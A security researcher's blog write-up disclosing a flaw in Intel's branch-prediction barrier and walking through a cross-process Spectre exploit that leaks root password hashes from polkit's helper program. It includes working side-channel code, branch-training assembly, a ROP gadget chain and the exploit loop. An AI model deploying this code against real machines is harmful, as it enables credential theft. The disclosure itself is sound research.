Cross-Process Spectre Exploitation

By Johannes Wikner

October 18, 2024

Share to Facebook Share to LinkedIn Share to Twitter Share to Reddit Share to Email

I will walk through a cross-process Spectre attack I developed, partly whileinterning at Open Source Security, Inc.

Cross-Process Spectre

I have developed an exploit to demonstrate the impact of an incomplete IndirectBranch Prediction Barrier (IBPB) in Intel Golden Cove and Raptor Cove that Idiscovered. IBPB is meant to invalidate allindirect branch targetpredictions, which includes returns and jump/call instructions that take amemory or register operand (i.e., indirect branches). However, due to buggymicrocode -- which appears to be an emergent problem in modern processors --certain return target predictions are retained across IBPBs.

Back at ETH, Kaveh and I wrotea paper on this matter that we're publishing today along with this write-up. In the paper we also exploited asemantics issue of IBPB on certain AMD parts, leading to privileged memorydisclosure on systems using IBPB-on-entry, which ironically is meant to bethe more comprehensive mitigation alternative to the suspicious-looking, software-basedSafeRET andretbleed thunk mitigations. In this write-up I will focus on thecross-process exploit, which is special for a couple of reasons.

AFAIK, this is the first end-to-end cross-process Spectre exploit that doesnot exploit fake toy-programs.
The overwhelming majority of software authors are unconcerned aboutcross-process Spectre attacks, indicated by the fact that none of themenable IBPB. The only exception I've seen is Google Chrome.

Unlike OS-kernels, which are packed with 1000s of lines of code toselect the appropriate mitigations to fend off cross-privilege Spectre attacks,user programs do nothing --- even if they run as root and managesensitive information (e.g., OpenSSH, sudo, polkit). With this work, I hope toconvince software authors of such programs to use IBPB. However, even if theydid use IBPB, they would have been vulnerable to the attack I'll explainanyway. Intel has patched the IBPB issue in a microcode update releasedearlier this year, so now they would be safe.

What IBPB?

Branch prediction state shared across processes running on the same core.While predictions may be restricted to the sibling thread and privilege domainthey belong to, programs running in the same thread and privilegedomain can influence each other's speculative control flow. To prevent this, IBPBshould be used. IBPB is trigged from the privileged domain with aModel-Specific Register (MSR) write:

    movq   $0x49, %rcx ; MSR_IA32_PRED_CMD    movq   $1, %rax    ; PRED_CMD_IBPB    xor    %rdx, %rdx    wrmsr

User programs can enable this via theprctl() ABI. Besides user programs,hypervisors like KVM will unconditionally use IBPB when switching vCPUs. It isalso likely -- however I didn't test it, and it is not explicitly documented --that transitioning to SGX enclaves and to SMM imposes an implicit IBPB as well.

Before delving deeper, we'll cover some additional background on Spectre attacks.

How Spectre mis-speculations are exploited

Most of us are aware of at least some of the various Spectre vulnerabilitiesthat modern processors are susceptible to. In a Spectre attack, the goal of theattacker is to leak unauthorized data by combining transient execution ofincorrect control flow, caused by a branch misprediction, with side-channelanalysis.

Branch misprediction

Branch prediction concerns conditional branch directions (e.g., taken vs.fall-through) and branch target addresses stored in microarchitectural core-localtable-like datastructures. Our focus is on branch target address predictions.Intel processors are known to store these in Branch Target Buffers (BTBs) andTAGE-table-like structures. We do notneed to understand how these work exactly. However, for a mental picture, Ishow an illustration of my own view below. Details about Intel's TAGEconfiguration I copied from the recentindirectorpaper.(I am not claiming that this resembles any actual implementations, butworks for the purpose of this write-up)

IP[23:0]----------+                  |       +----------v--------------+       | BTB                     |       |-------------------------|Set 0  | Entry0 | ... | Entry 11 |      +---------------------------------------------+Set 1  | Entry0 | ... | Entry 11-+----->| BTB entry                                   |Set .. |                         |      |---------------------------------------------|Set 1K | Entry0 | ... | Entry 11 |      | 8bit | 1bit   | 2bit | 2bit | 1bit | 32bit  |       +-------------------------+      | TAG  | THREAD | PL   | TYPE | OF   | TARGET |                                        +--------------------------|------------------+           +-----------------+--------------------+----------------+           |                 |                    |                |        "RETURN"    ,--> "INDIRECT"    ,-----> "DIRECT" <-,   "CONDITIONAL"           |        |        |   no-path-correl.  |       |        |        +-----+   "RSBA"     v         |          v     Taken      v        | RSB |-----'      "TAGE"------'        TARGET    '------ PHT        +-----+             VVVVIP[15:6]---------+-----------------------+----------------------+                 |                       |                      |             BHB[67:0]               BHB[131:0]             BHB[387:0]                 |                       |                      |        +--------v--------+     +--------v--------+     +-------v---------+        | TAGE1           |     | TAGE2           |     | TAGE3           |        |-----------------|     |-----------------|     |-----------------|Set  0  | Entry0 | Entry1 |     | Entry0 | Entry1 |     | Entry0 | Entry1 |Set  1  | Entry0 | Entry1 |     | Entry0 | Entry1 |     | Entry0 | Entry1 |Set ..  |      ....       |     |      ....       |     |      ....       |Set 511 | Entry0 | Entry1 |     | Entry0 | Entry1 |     | Entry0 | Entry1 |        +----|------------+     +-----------------+     +-----------------+             |                                                   ^             |                              194 branches hist----'             |  +----------v------------+  | TAGE entry            |  |-----------------------|  | 10bit | 48bit  | 2bit |  | TAG   | TARGET | PL   |  +-----------------------+

The BTB is a set-associative buffer that is indexed by the current InstructionPointer (IP), where each BTB-entry contains a static target and atype. If thetype isINDIRECT, the (indirect) branch target prediction is in factdynamic and depends on the path-history. If thetype isRETURN, we shouldreceive the branch target from the Return Stack Buffer (RSB), which records theupcoming return address for every encounteredcall instruction. Storingbranchtype information within the BTB allows the processor prepare aprediction ahead of time, before instruction decode of its branch source hascompleted, which can lead toPhantomspeculation, whichSRSO exploits.

For indirect branch target prediction, the BTB becomes the 0th-level "tagless"TAGE table that is used when there is no correlation between path history andthe branch. Otherwise, we will also consider the branch targets fromhigher-level TAGE-tables, picking the target that correlates with the longestpath-history. Intel refers to this path-history as a Branch History Buffer(BHB). If the current BHB does not correlate with prediction in the TAGEtables, we fallback to the static target of the BTB.

For return target prediction, the BTB and TAGE entries may also become relevantshould the RSB not reference a valid target, for example because the RSB isempty. If so, Intel's "bottom-less" RSB instead uses an alternate predictionscheme (RSBA), which essentially means treating the BTB entry of the return asif it had typeINDIRECT. For this to work, every time a return is executed,it does not only update the RSB-state, but it also updates the indirect branchpredictor with return targets.

Additional information needs to be stored like the privilege levelPL, thehardware threadTHREAD, and an overflow bitOF, to determine if a directbranch target crosses a 4 GiB boundary. I also imagine that information ofwhether the branch is aCALL might be recorded for faster RSB updates.

Side-channel analysis

What we most commonly see in Spectre attacks is that the attacker forces thevictim to make a misprediction to transiently access unauthorized memory("secrets") and use these in subsequent "secret"-dependent operations. Theattacker can deduce the secret via a Flush+Reload (F+R) side channel. F+R is acomparably fast and low-noise side channel, but relies on memory sharingbetween the attacker and the victim. That is usually not a concern however. Forexample, all user memory is shared with the kernel via physmap, and user memoryof non-writable sections of shared libraries are shared across all processesusing the library (so you don't need to keep 1000 copies of glibc in memory forevery running program ;))

Flush+Reload

Here is an F+R example. We introduce a "reloadbuffer"RB, that contains anumber of "entries" that will be flushed and reloaded while measuring theiraccess times, revealing if the memory was fetched after it was flushed. Eachentry has a corresponding bin in a histogramRB_HIST. When reloading, ifthere is a cache hit for a particular entry (deduced by its access time), therespective bin increments.

#include <stdio.h>#include <string.h>#include <sys/mman.h>#include <err.h>/* it's generally better to hardcode hit/miss threshold than to compute it: * 1. threshold becomes an immediate * 2. calibrating requires a warmup to get stable value => slow. * The following should detect LLC misses on all microarchs. */#ifndef CACHE_MISS_THRES#define CACHE_MISS_THRES 150#endif#ifndef RB_PTR/* The Reload Buffel "RB" will take a hardcoded address so that it unlikely * neighboring other data */#define RB_PTR 0x13200000UL#endif#ifndef RB_STRIDE/* Each cache line that we flush+reload is separated by 4096 bytes. Smaller * strides are possible, but increases the chance of data cache prefetching => * noisy results. */#define RB_STRIDE (1UL<<12)#endif#ifndef RB_SLOTS/* If we're just testing if a side channel works, we are fine with just a few * entries. To leak full bytes we would need 256 entries. */#define RB_SLOTS 8#endif#ifndef SECRET/* If we're just testing if a side channel works, we can aim at leaking a * pre-determined "secret" value. */#define SECRET 6#endif#ifndef RB_OFFSET/* Rather than reloading a page-aligned address, we can pick something else. * The first few CLs of a page are more likely prefetched than others. */#define RB_OFFSET 0x180#endif#ifndef RB_HIST/* We keep the results in a histogram with RB_SLOTS bins. We give it a fixed * address too to make the reloading code position independent. */#define RB_HIST 0x1800000#endif#ifndef mb/* Wait for all memory operations to complete before continuing. */#define mb() asm("mfence" ::: "memory");#endiftypedef unsigned long u64;typedef unsigned int u32;typedef unsigned char u8;/* Start measure */static __always_inline u64 rdtsc(void) {    unsigned lo, hi;    asm volatile ("lfence\n\t"            "rdtsc\n\t"            : "=d" (hi), "=a" (lo));    return ((u64)hi << 32) | lo;}/* Stop measure */static __always_inline u64 rdtscp(void) {    unsigned lo, hi;    asm volatile("rdtscp\n\t"            "lfence\n\t" : "=d" (hi), "=a" (lo)            :: "ecx");    return ((u64)hi << 32) | lo;}/** * Reload the n cache lines used for flush+reload. If access time is below the * threshold, increment the respective counter for the histogram/results. */static __always_inline void reload_range(long base, long stride, int n, u64 *results) {    mb();    /* unroll the loop to avoid triggering data cache prefetcher. */#pragma clang loop unroll(full)    for (u64 k = 0; k < n; ++k) {        /* semi-randomize the reload-order to avoid triggering data cache prefetcher */        u64 c = (k*7+5)&(n-1);        unsigned volatile char *p = (u8 *)base + (stride * c);        u64 t0 = rdtsc();        *(volatile unsigned char *)p;        u64 dt = rdtscp() - t0;        if (dt < CACHE_MISS_THRES) results[c]++;    }}/** * Flush all the cachelines used for flush+reload. */static __always_inline void flush_range(long start, long stride, int n) {    mb();    for (u64 k = 0; k < n; ++k) {        volatile void *p = (u8 *)start + k * stride;        asm volatile("clflushopt %0\n" ::"m"(*(const char *) p));    }}static u8* rb = (u8 *)RB_PTR;static u64 *rb_hist = (u64 *)RB_HIST;#define ROUND_2MB_UP(x) (((x) + 0x1fffffUL) & ~0x1fffffUL)/* Prefer huge pages for the reloadbuffer => less noise. */#define RB_SZ ROUND_2MB_UP((RB_SLOTS * RB_STRIDE) + 0x1000UL)#define MMAP_FLAGS (MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED_NOREPLACE)/** * Convenience macros. */#define rb_reset() memset(rb_hist, 0, RB_SLOTS * sizeof(*rb_hist))#define rb_flush() flush_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS);#define rb_reload() reload_range(RB_PTR+RB_OFFSET, RB_STRIDE, RB_SLOTS, rb_hist);/** * Initialize flush+reload buffer referenced by (RB_PTR) and the results * (RB_HIST). */static void rb_init() {    /* Histogram, or simply put, the results. */    if (mmap((void *)RB_HIST, RB_SLOTS*sizeof(u64), PROT_READ | PROT_WRITE, MMAP_FLAGS|MAP_POPULATE, -1, 0) == MAP_FAILED) {        err(1, "rb_hist");    }    if (mmap((void *)RB_PTR, RB_SZ, PROT_READ | PROT_WRITE, MMAP_FLAGS, -1, 0) == MAP_FAILED) {        err(1, "rb");    }    /* Try to make this page a single 2MB page, to avoid TLB missing when     * reloading. */    madvise((void *)RB_PTR, RB_SZ, MADV_HUGEPAGE);    memset((void *)RB_PTR, 0xcc, RB_SZ); /* Make sure it isn't zero-page backed*/}#define ROUNDS 1000int main(void) {    rb_init();    rb_flush();    rb_reset();    for (int i = 0; i < ROUNDS; ++i) {        rb_flush();        mb();        // touch something.        *(u8*) (RB_PTR+RB_OFFSET+SECRET*RB_STRIDE) = 12;        mb();        // we will be able to deduce what entry was touched.        rb_reload();    }    // print each bin.    for (int i = 0; i < RB_SLOTS; ++i) {        printf("%04ld ", rb_hist[i]);    }    printf("\n");    return 0;}

The code should be compiled with clang, with optimizations enabled. Running it will result in the entry index defined by SECRET getting hot.

clang -Og -DSECRET=6 ./ex1.c -o ex1 && ./ex1# > 0000 0000 0000 0000 0000 0000 1000 0000clang -Og -DSECRET=4 ./ex1.c -o ex1 && ./ex1# > 0000 0000 0000 0000 0999 0000 0000 0000

See how the results turn noisier if we for example reduce the stride andincrease the number of entries (nb. must still be a power of 2).

clang -Og -DRB_SLOTS=32 -DRB_STRIDE=128L ./ex1.c -o ex1 && ./ex1# > 0000 0000 0003 0002 0002 0000 0999 0000 0000 0001 0000 0000 0000 0000 0000 0000 0000 0000 0001 0000 0001 0001 0000 0001 0001 0000 0000 0001 0000 0000 0000 0000

Comparing the signal of the expected-hot entry with the other entries lets usinfer how noisy the measurement is, and it lets us detect bugs. For example, ifwe forget the optimizations we would immediately see that something is notright.

clang ./ex1.c -o ex1 && ./ex1# > 0999 1000 0996 0999 0125 0000 1000 0000

We will use F+R to observe indirect branch target misprediction.

Observe indirect branch misprediction

There is a key-difference between path-history-based and IP-based indirectbranch target prediction. The IP-based one is using the BTB, which only has thelower 32 bits of the target. We can observe this with a simple F+R experiment.

Consider the following four snippets.

/* training branch source */mk_snip(tr_src,    "mov $" STR(RB_PTR) ", %rax;"    "clflush (%rdi);"    "mfence        ;"#ifdef USE_RET    "push (%rdi)   ;"    "ret           ;"#else    "jmp *(%rdi)   ;"#endif);/* victim branch source */mk_snip(vi_src,    "mov $" STR(RB_PTR) ", %rax;"    "clflush (%rdi);"    "mfence        ;"#ifdef USE_RET    "push (%rdi)   ;"    "ret           ;"#else    "jmp *(%rdi)   ;"#endif);/* This one will never execute */mk_snip(tr_dst_IP,    /* signals "2", assumes RB_PTR in rax */    "mov " STR(RB_OFFSET + RB_STRIDE * 2)"(%rax), %rax;"    "lfence;"    "ret;");mk_snip(tr_dst_BHB,    /* signals "4", assumes RB_PTR in rax */    "mov " STR(RB_OFFSET + RB_STRIDE * 4)"(%rax), %rax;"    "lfence;"    "ret;");

We assign these snippets the following code pointers.

init_snip(&tr_src_desc,     0x10000000000, tr_src);/*                                v- bit 24 */init_snip(&vi_src_desc,     0x01001000000, vi_src);/*                               v-- bit 32  */init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB); /* Near the tr_src */init_snip(&tr_dst_IP_desc,  0x01020000000, tr_dst_IP);  /* Near the vi_src */

The BTB on Golden Cove and Raptor Cove only uses the lower 24 bits to addressthe BTB. Hence,tr_src andvi_src resolve to the same BTB set and tag(i.e., aliasing). After we executetr_src with a pointer totr_dst_BHB inrdi, a new prediction is created. The BTB however only contains the lower32 bits of the target, while the full target is stored in the TAGE tables. So thequestion is: after trainingtr_src withtr_dst_BHB as target, willtr_dst_BHB ortr_dst_IP be predicted when we executevi_src?

Assuming the path-history leading up tovi_src was different,maybe we itpredicttr_dst_IP, once. However, the next time it will recognize themistake and avoid repeating it. To make it consistently mispredicttr_dst_IP ortr_dst_BHB, we need to introduce path-history.

#define OP_RET 0xc3#define BHB_AREA 0x4400000000Lstatic void init_bhb_area() {    if (mmap((void *)BHB_AREA, 1L<<24, PROT_READ|PROT_WRITE|PROT_EXEC, MMAP_FLAGS, -1, 0) == MAP_FAILED) {        err(1, "bhb_area");    }}static void random_bhb(u64 *bhb, int n) {    for (int i = 0; i < n; ++i) {        // some random sequence of return branches in the BHB_AREA        bhb[i] = BHB_AREA + (random()%(1L<<24));        *(u8 *) bhb[i] = OP_RET;    }}#define BHB_LEN 195static u64 bhb[BHB_LEN];static code_snip_t tr_src_desc, vi_src_desc, tr_dst_BHB_desc, tr_dst_IP_desc;static int main(void) {    init_bhb_area();    srandom(getpid());    random_bhb(bhb, BHB_LEN);    init_snip(&tr_src_desc,     0x10000000000, tr_src);    init_snip(&tr_dst_BHB_desc, 0x10020000000, tr_dst_BHB);    init_snip(&vi_src_desc,     0x01001000000, vi_src);    init_snip(&tr_dst_IP_desc,  0x01020000000, tr_dst_IP);    #define ROUNDS 1000    for (int i = 0; i < ROUNDS; ++i) {        /* train */        asm(            "lea 33f(%%rip), %%rax ;" /* return address after training */            "push %%rax            ;"            "push %1               ;" /* training source */            "mov %0, %%rbx         ;" /* add the branch history*/            ".rept " STR(BHB_LEN) ";"            "  push (%%rbx)        ;"            "  add $8, %%rbx       ;"            ".endr                 ;"            "ret                   ;" /* go through BHB, then branch source */            "33:                   ;"            :: "r"(bhb), "r"(tr_src_desc.ptr), "D"(&tr_dst_BHB_desc.ptr) : "rax", "rbx");        rb_flush();        /* DO STUFF HERE */        /* run victim */        asm(            "lea 33f(%%rip), %%rax ;"            "push %%rax            ;"             "mov %%rsp, %%rdi      ;" /* vi_src will take us right back to "33:" */            "push %1               ;"            "mov %0, %%rbx         ;"            ".rept " STR(BHB_LEN) ";"            "  push (%%rbx)        ;"            "  add $8, %%rbx       ;"            ".endr                 ;"            "ret                   ;"            "33:                   ;"            "add $8, %%rsp         ;" /* re-adjust stack */            :: "r"(bhb), "r"(vi_src_desc.ptr): "rdi", "rax", "rbx");        rb_reload();    }    rb_print();    return 0;}

If we run this, we get:

0000 0000 0000 0000 1000 0000 0000 0000 # jmp*, matching bhb

Unsurprisingly, thanks to the matching path-history leading up tovi_src andtr_src,vi_src mispredictstr_dst_BHB. If we instead randomize the BHBbefore we runvi_src, for example by insertingrandom_bhb(bhb, BHB_LEN);before/* run victim */, we get instead:

0000 0000 0930 0000 0001 0000 0000 0000 # jmp*, randomized bhb

In fact, because all TAGE table addressing depends on the most recent path history, only randomizing the last branch in the BHB yields the same result as the above.

So the misprediction now tooktr_dst_IP -- which is funny, because we neverexecuted that code in the program. We can now do the same thing withUSE_RETset to use returns and get.

0000 0000 0000 0000 0979 0000 0000 0000 # ret, matching bhb0000 0000 0324 0000 0000 0000 0000 0000 # ret, randomized bhb

So we get the same result, but with a bit weaker signal. Many of you might findit strange to see what appears to be indirect branch target predictions on topof returns. However, this is an Intel feature that has many names, such as"bottom-less RSB", "RSBA", "RRSBA". Return Stack Buffer Alternate (RSBA) occurswhen the RSB is empty. Because of our long path-history, consisting only ofreturns, the RSB is guaranteed empty when we hit the victim branch, hence we getRSBA. To be precise, on eIBRS systems, we call it Restricted RSBA (RRSBA)since the alternate predictions (not the RSB predictions) are protected byeIBRS (they are indirect branch predictions after all).

Bring in IBPB

We want to check whether IBPB handles these predictions. There's a super easy way(thanks tobsdaemon ;)) to trigger IBPB in Linux 6.2+, we can just do

prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0);

I was on an Ubuntu 5.15.0-97-generic while doing this work, so I did same usinga kernel module instead. Now, if we have an IBPB after training and testvi_srcfor (1) path-based and (2) ip-based predictions for (a) indirect branch and (b)return, we expect all predictions to be invalidated, therefore all signal to be gone. Instead however, we get something unexpected.

0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (1,a)0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, ret,  (1,b)0000 0000 0000 0000 0000 0000 0000 0000 # ibpb, jmp*, (2,a)0000 0000 0155 0000 0000 0000 0000 0000 # ibpb, ret,  (2,b)

We are still getting signal fromtr_dst_IP, post IBPB! It took a while to concludethat this was not a software bug. In fact, this is a microcode bug! Theprediction is retained across the IBPB. But what should we do with thisinteresting effect?

Build a cross-process Spectre leak

Two things that IBPB is used for are context switches and vCPU switches. Whileit would be cool (and certainly not impossible) to leak information from aco-tenant VM with this primitive, it appears easier to prove the impact of thevulnerability by targeting context switches between processes.

The funny thing is however that nobody appears to have built a realcross-process Spectre attack in the past. So in order to prove that IBPB bugsare a real problem, we must first build cross-process Spectre exploit. One thatIBPB should protect against.

Another funny thing is that the only victim candidate I found that was usingIBPB was Google Chrome. But we are already deep down in a mess, and descendingdeeper, into javascript hell, would not do my sanity well.

Instead we will target a SUID program that lets you authenticate as root viaa password prompt. After a bit of poking around, I decided that polkit appearedto be a perfect victim, specifically the/usr/libexec/polkit-agent-helper-1that is present on most Linux machines.

polkit-agent-helper-1 is not meant to be run by humans, but reading itssource code shows that it takes two arguments: the user to authenticate as (wewill use root, of course) and a "cookie", which we don't really care about.Secondly,stdin must be anything but a tty for it to work. So we can run itlike:

while true; sleep 2; do echo -n A; done | /usr/libexec/polkit-agent-helper-1 root asdfadsf# > PAM_PROMPT_ECHO_OFF Password:

Since the attacker can obtain of the same binaries and libraries as the vicitm(e.g. via apt repos), they can debug this program with full privileges locally.So we runstrace on it:

while true; sleep 2; do echo -n A; done | sudo strace -eopenat,read /usr/libexec/polkit-agent-helper-1 root asdfadsf# > read(3, "root:x:0:0:root:/root:/bin/bash\n"..., 4096) = 2669# > openat(AT_FDCWD, "/etc/shadow", O_RDONLY|O_CLOEXEC) = 3# > read(3, "root:$6$HGU6y/YF5$rf5na/CbCxzKWR"..., 4096) = 1651# > PAM_PROMPT_ECHO_OFF Password:# > read(0, "A", 4096)                      = 1# > read(0, "A", 4096)                      = 1# > read(0, "A", 4096)                      = 1# > read(0, ^Cstrace: Process 334359 detached# >  <detached ...>

This is fantastic and weird at the same time! It reads the password hashes from/etc/shadow before even taking the password. It appears thatlibpam, whichmanages the authentication, does this to check that the password is valid andhasn't expired. It also stores the password hash in memory inside the pamcontext.

We want to hijack a return in this process by first training it in our attackerprocess, then trigger the victim process to run by sending a character to itsstdin.

To figure out which returns are exploitable, we can use Intel PT (viaperf) to createa--call-ret trace.I recorded the function graph from my process over the context-switch to the polkit helper, who is `read`-ing my process' characters via an `fgets` call in itspam conversation.There are three returns in the victim, all in glibc, that could be exploited if predicted with RRSBA:read,_IO_file_underflow, and_IO_default_uflow. Unfortunately, they arenotpredicted with RSBA, because the call-depth imposed byread in the victim istoo shallow. However, the victim accepts any kind ofstdin, except a tty. Soinstead of attaching a normal pipe to interact with the victim'sstdin, wecan attach asocket. Because sockets are much more complicated to read from,theread call-depth of the victim now exceeds the RSB capacity, leading toexploitable RRSBA-predicted returns for all three returns.

We take a look at_IO_default_uflow ingdb and we what find is surprising!

Breakpoint 1, 0x00007ffff7c46db0 in __GI__IO_default_uflow (fp=<optimized out>) at ./libio/genops.c:366366     ./libio/genops.c: No such file or directory.   0x00007ffff7c46daf <__GI__IO_default_uflow+79>:      5d      pop    %rbp=> 0x00007ffff7c46db0 <__GI__IO_default_uflow+80>:      c3      ret   0x00007ffff7c46db1 <__GI__IO_default_uflow+81>:      0f 1f 80 00 00 00 00    nopl   0x0(%rax)(gdb) i rrax            0x41                65rbx            0x0                 0rcx            0x7ffff7ccd7e2      140737350784994rdx            0x555555596301      93824992502529rsi            0x555555596300      93824992502528rdi            0x0                 0rbp            0xa                 0xarsp            0x7fffffffe148      0x7fffffffe148r8             0x0                 0r9             0x555555596300      93824992502528r10            0x7ffff7dd4270      140737351860848r11            0x246               582r12            0x7ffff7dd3aa0      140737351858848r13            0x0                 0r14            0x7fffffffe1f0      140737488347632r15            0x1ff               511rip            0x7ffff7c46db0      0x7ffff7c46db0 <__GI__IO_default_uflow+80>eflags         0x202               [ IF ]cs             0x33                51ss             0x2b                43ds             0x0                 0es             0x0                 0fs             0x0                 0gs             0x0                 0(gdb) x/s $rsi0x555555596300: "Aoot:$6$HGU6y/YF5$rf5na/CbCxzKWRjrkPYDb1oN5ZI7TSxVs8Epz79q9jUyZnIqmmIGYd4lzOVa8I4yyGQ2SSjyd0op5mujCdX4Q.:19755:0:99999:7:::\ndaemon:*:19235:0:99999:7:::\nbin:*:19235:0:99999:7:::\nsys:*:19235:0:99999:7::"...

As we're reading entered characters from the password prompt, the stream bufferthatstdin receives password input onto (here'A') already references thesecret that we want to leak, and it's referenced by three different registers!Even better, the last entered character sits inrax, which can act as anindex to target a specific byte of the secret. How did that happen?

Because the password hashes were read right before presenting the passwordprompt, the most recently freed memory was the stream buffer of the file handlefor/etc/shadow. When we immediate allocate a new stream buffer forstdin,which is of the same size as the previous one,malloc recycles that memory.So the memory thatrsi,rdx, andrsi reference is in fact simplyuninitialized memory that happened to have held secrets just before.

But how should we leak the secret?

Gadget chain

We know that we can hijack a return and make it speculatively execute a targetof our choice in the victim's address space. The speculated target needs toread a byte of the secret usingrax as index. Then we need to transmit itto the attacker over a F+R side channel. Because read-only sections of sharedlibraries are shared in physical memory, the idea is to use the executablesection of glibc, referenced byrcx andrip, as the "reloadbuffer". So wewant to make a secret-dependent memory access torcx orrip, so that we canlater deduce the secret in the attacker's process.

I realized that it is not going to be easy to find code in the victim's address space (marked "present", as we can't manage #PFs under speculation) that loads part of the secret from memory and transmits it (via F+R). Not in one single gadget. However, maybe it ispossible to stitch together a chain of gadgets that does one of each necessaryoperation and trigger a series of nested return mispredictions to speculativelyexecute all of them. At this point, I was mildly exhausted, so I reached out tothe very encouraging and enthusiastic security folks at Google. They told methat they would be happy to find me a ROP-gadget chain -- they are a searchcompany after all! Indeed, a few days later Chani Jindal sent me a perfectlylooking gadget chain:

0x7ffff68efa69: movzx eax, byte [rax+rdx] ; ret ; (/usr/lib/x86_64-linux-gnu/libicuuc.so.70.1)0x7ffff7cef5b7: rol eax, 0x08 ; ret             ; (/usr/lib/x86_64-linux-gnu/libc.so.6)0x7ffff75f45ec: shl rax, 0x02 ; ret             ; (/usr/lib/x86_64-linux-gnu/libzstd.so.1.4.8)0x7ffff73af74b: mov al, byte [rcx+rax] ; ret    ; (/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4)

The first one reads a byte of the secret using the attacker-controllableraxas index, with zero-extension so the rest ofrax gets zapped. The secret thengets left-rotated 8 times and left-shifted another 2 times and finally used asindex in a memory load ofrcx.

Exploit!

The procedure works as follows.The attacker forks a new process and pins it and itself to the same hardwarethread and spawn the victim program. Sharing hardware thread allows theattacker and victim share branch prediction and cache state. The attacker attaches a socket to thestdin of the victim and waits for the password prompt.To train the gadget chain in the victim, we just execute construct a ROP-gadgetchain, made up of NOPs0x90 and RETs0xc3, at aliasing addresses.

#define LIBC_AX         0x7ffff7be0000#define LIBICUUC_AX     0x7ffff68eb000#define LIBZSTD_AX      0x7ffff75ee000#define LIBPCRE2_8_AX   0x7ffff73ad000#define GADGET(start, size)       \    {                             \        start, start + (size - 1) \    }static struct bhb_bb bhb_path_b[] = {    // __GI__IO_default_uflow    GADGET(LIBC_AX     + 0x065d96, 27), //    // movzbl (%rax,%rdx,1),%eax ; ret \x0F\xB6\x04\x10\xC3    GADGET(LIBICUUC_AX + 0x005a69, 5),    //  rol $8, %eax; ret \xC1\xC0\x08\xc3    GADGET(LIBC_AX     + 0x10e5b7, 4),    // shl $2, %rax ; ret \x48\xC1\xE0\x02\xc3    GADGET(LIBZSTD_AX  + 0x45ec, 5),    // mov (%rcx,%rax,1), %al ; ret \x8A\x04\x01\xC3    GADGET(LIBPCRE2_8_AX + 0x74b, 4)};#define BHB_B_LEN (sizeof(bhb_path_b) / sizeof(*bhb_path_b))void init_gadgetchain(long off){    for (int i = 0; i < BHB_B_LEN; ++i) {        struct bhb_bb *bb = &bhb_path_b[i];        memset(_ptr(F(bb->start_adr - off)), 0x90, bb_len(bb));        memcpy(_ptr(F(bb->end_adr - off)), "\xc3", 1);    }}void train_gadgetchain(u64 off){    static long bbstack[6];    for (int i = 0; i < BHB_B_LEN; ++i) {        bbstack[i] = F(bhb_path_b[i].start_adr - off);    }    void finland();    bbstack[BHB_B_LEN] = (long)finland;    bbstack[0] = F(bhb_path_b[0].start_adr - off);    asm("mov    %%rsp, %%r15  \n"        "lea    8(%0), %%rsp  \n"        "jmp    *(%0)         \n"        "finland:             \n" /* come back here */        "mov    %%r15, %%rsp  \n" ::"r"(bbstack)        : "r15", "rax", "memory");}

To trigger with the victim, we send a byte to it corresponding to the byteoffset we want to leak of the secret.

static struct timespec req = {0,0};int runsu_poke(child_proc_t *child, char c) {    int ret = write(child->input, &c, 1);    clock_nanosleep(CLOCK_REALTIME, 0, req, NULL);    return ret;}

The condensed procedure becomes something similar to:

static const u64 rb_start = (u64)read + 18; /* rcx in victim points to read<+18> */for (int sec_idx = 1; sec_idx < 110; ++sec_idx) {    while (guess == -1) {        train_gadgetchain(off);        flush_range(rb_start, RB_STRIDE, RB_SLOTS);        runsu_poke(runsu, sec_idx-1);        reload_range(rb_start, RB_STRIDE, RB_SLOTS, results);        for (int i = 1; i < RB_SLOTS; ++i) {            if (results[i] > 1) {                guess = i;                break;            }        }    }    secret[sec_idx] = guess;}

Does this work? Not at all! First of all, we have to win a race condition. Weneed to have enough time to execute the entire gadget chain, before the realreturn target comes back from the program stack. I was stuck as this point foran awful long time. I attempted evicting the program stack from a siblingthread, however it didn't work. I attempted to prefetch the code of therespective gadgets by targeting preceding returns, which also did not work. Because theshl gadget is not strictly necessary, I removed it.

Because the results were extremely noisy, rather than flushing and reloading anentire range, I tried to only flush and reload a single entry, matching the 'o'of 'root' in the password hash. If any of the tweaking would work, it should beable to detect this byte.

To slow down the victim, I introduced random memory noise from a victim threadby simply running an old stress test toolstress -m 1. I would occasionallysee what appeared to be signal from the 'o' in this way. However, the resultswere still noisy. It appeared that certain instance of the victim process weremore noisy than others and those instances wouldn't be able to leak anything.So I would test each victim instance if it was able to leak 'o' before I woulduse it. This way, I was able to leak information -- however at an incredibly lowspeed! But that is a different problem, we only wanted to conclude that it works!

Behold:https://www.youtube.com/watch?v=VYEVcj-vnbs

What about ASLR?

I skipped this for brevity. However, we do derandomize ASLR, and incrediblyefficiently too! We derandomize the lower 32 bits of the address space, whichis sufficient: we only need the lower 24 bits to hijack a particular branch,and only the lower 32 bits are recorded in the BTB prediction anyway. Toderandomize, we use a "reversed" branch target injection attack, in the sensethat we let the victim train a branch in the attacker process. The attackerthen guesses around until it finds a branch that gets predicted with aprediction from the victim, thereby learning about its address space layout.For details on the ASLR exploit, I refer you to thepaper.

Movatterモバイル変換